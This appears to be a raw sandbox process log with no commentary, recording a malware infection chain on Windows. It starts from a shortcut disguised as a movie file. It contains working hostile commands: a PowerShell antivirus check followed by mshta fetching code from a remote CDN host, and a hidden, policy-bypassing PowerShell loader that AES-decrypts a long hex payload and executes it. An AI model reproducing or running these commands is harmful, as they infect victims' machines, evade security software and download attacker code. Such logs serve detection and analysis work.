cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\Full Movie HD (1080p).lnk"
2552powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $U = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($c in $U ){if ($c.displayName -replace 'Windows Defender', ''){Exit}}.'mshta'https://mato3f.b-cdn.net/town
2664powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function zQzRr($mumOI){return -split ($mumOI -replace '..', '0x$& ')};$FNODhfe = zQzRr('6900DCF2010BF7C770825591E4C0DA18CAC44082B428C72DBDBC78DCABD412FFABFA704C8978BC31AB4D03DE7FA383BB863FAFFA902F3AC4A5E1BF90F3929C37AC801A4506BD53303DE6DA41929878ED07AC46DFEF4A2251CAE8FCA3562BCAF37FBBC1302B82A84C002A79EFA904BCAAC90EC4A2C22FB3002BA3FD3CC3ABAAF79E133193ECE269D449EF7183700E42A464B66ACEDE221740C00686A9E3AD31B51AB5860FE7640ADAC84D09F27BEE4DBC2355E95C946BB6F65EB72609BEDBFF248BF12E43338FC2E56C88168A333D60336D9A93966CED574CC64ABAFA5688F9DD5953D5AEFA48559C596B0AC98CB4E59E9EA9D6B06E2238FA33C07E894FEBF1988526F7840E27AD6DE5FF6BF79BE1FBB8EDC6B69C5D85BC3A26A21DF93DF6A7D77BC504DF6AE25E17E5316A4BB974EB7B8689D2A31DEF602E7711BA7B917E92848B05CFE6AF5D7504389EDB73A5B34742DB545132B3587A6EB846836EBEED1668FC993C330649B50C61AB7B124A4A1D831D1F150D3389682337AE5480B2992AF5D5576003D32D9225080144D6D72BA489500E397DA2C03839738792F7BB1F8C22DAD0A1A88DA66A29D0A215B527E1572B5A48437B579FB21F2E115349DBB9377E01F9ED9285F108A39AF02707C497135A9B2E8A41A9B2F0861E7EED396C35A9A9054F41C6A3DE2BB8808DB8C4D723AA7E4187438BFC292CE6B89C1A39557913938CD7BBDB81D06C41A339BA2263BC5D4F7189706A007AFC0CDCC89A1F7B38AF078201DB4C466F11D668654FA267A1A133FD986B1117798952F28E5D5705973B35826F6D9E4EE5FDF57529C92C47D3E22A4225A7B76C00FE2E838D0805F8D372216C0817FD685729C4D372E9B7DC1FEA2F567CA2DC8283A799F801D74F364734A2C287C6C791D33E23AE49BE495153971C4F778E20258C6F4DE2886068BF4AF6F4F5AFEB6B11B86E0D8B278013E3FA8C8E1C39C136301935D82355629DF2E5529D9FA6C816CFDF3561558D193251943C0403BBC4CF1EECC3ED8F9CAB91CCB8B5B57DF4729974FAD66A939DF0B7CA6AC177739AACFCC83F04D71B1F489683FB183DE56FB398B056108ECE24362D08B73F04DD4D6C6C16EF0BC6AE51F172636708506760579E3C47B915CC5D46DC8071F28628D1D8012712E44DA4EE2977B37AB8B7643D658CAED9A0F3F6CDD404A9D8F77FD7D2084FE5C4E156036B2CB14BB1F97E5690D0D960B8E4587220B8C6348CBAC35CDAEDFBA5CA9889514489854EC4E269434885BE052FB3101D431EDA45AD5B543F5D8F19E07F1123E928F9026056373C822904149ABC217DAB15D3C39E97718AD6F8A8741DFA54EF1942F7486DDD09FA07917E9CC47BB5419C9B372142364810A0B3C7F1CEBF53EBDC7E0266BC7BEFFCC6CB1DD0841F50A17F6A75FD6B2F7E7617BE9DBCBA5AF9FCB476DB3CBAAC52468A839F762B9B4F58E46159528701B0D26CB0BDC544774DD3EF3D9448D970C73BF0DE948FC5A5FED2EA54480FC58C5A53D59F9A50D6DC04BF0F235DDDA317A57CE7ADFEC8EBAAFAC9A5E069E41C76A796A41FE8E7E80480A56F7DAD1D8222076BF0B087747C3EF3352505C32E1FA6BB072C191A52DA6AC16800AC66F3637B30D0A188B7E0EF103C0DC6698F35DA7866E3BDB8C8CD12508562906CED3A34F7A00E0CC2DD201620EF28AAB38BC3DBE1990D901728CC9360B66301DAD4810635C14D29ACC843DFA17F9DF50670F20F795207071DBEB110CEBD00D742D035FE2267EE8FB5D6FA1465A1DA192ABEA96D137903A9C19E917E5BFC525621600463C3B3FE3CA901C6485905B70B4AAAC6FFCC8F81D55604136BE19F2DCAF9D376A3926C8973221A64ED229B898C9BB60333FE06D7BE26D6998637E1EF7117C6AA2384282B48F737BB6C2E2EBED07E2DE24CB076F891A72A64486A25331C5D0C69CFB09D19');$nfYSp = [System.Security.Cryptography.Aes]::Create();$nfYSp.Key = zQzRr('414F54474F4B70516479435651546E44');$nfYSp.IV = New-Object byte[] 16;$hiWhfhne = $nfYSp.CreateDecryptor();$HsgRobclD = $hiWhfhne.TransformFinalBlock($FNODhfe, 0, $FNODhfe.Length);$tFBGjxYnH = [System.Text.Encoding]::Utf8.GetString($HsgRobclD);$hiWhfhne.Dispose();& $tFBGjxYnH.Substring(0,3) $tFBGjxYnH.Substring(3)
2972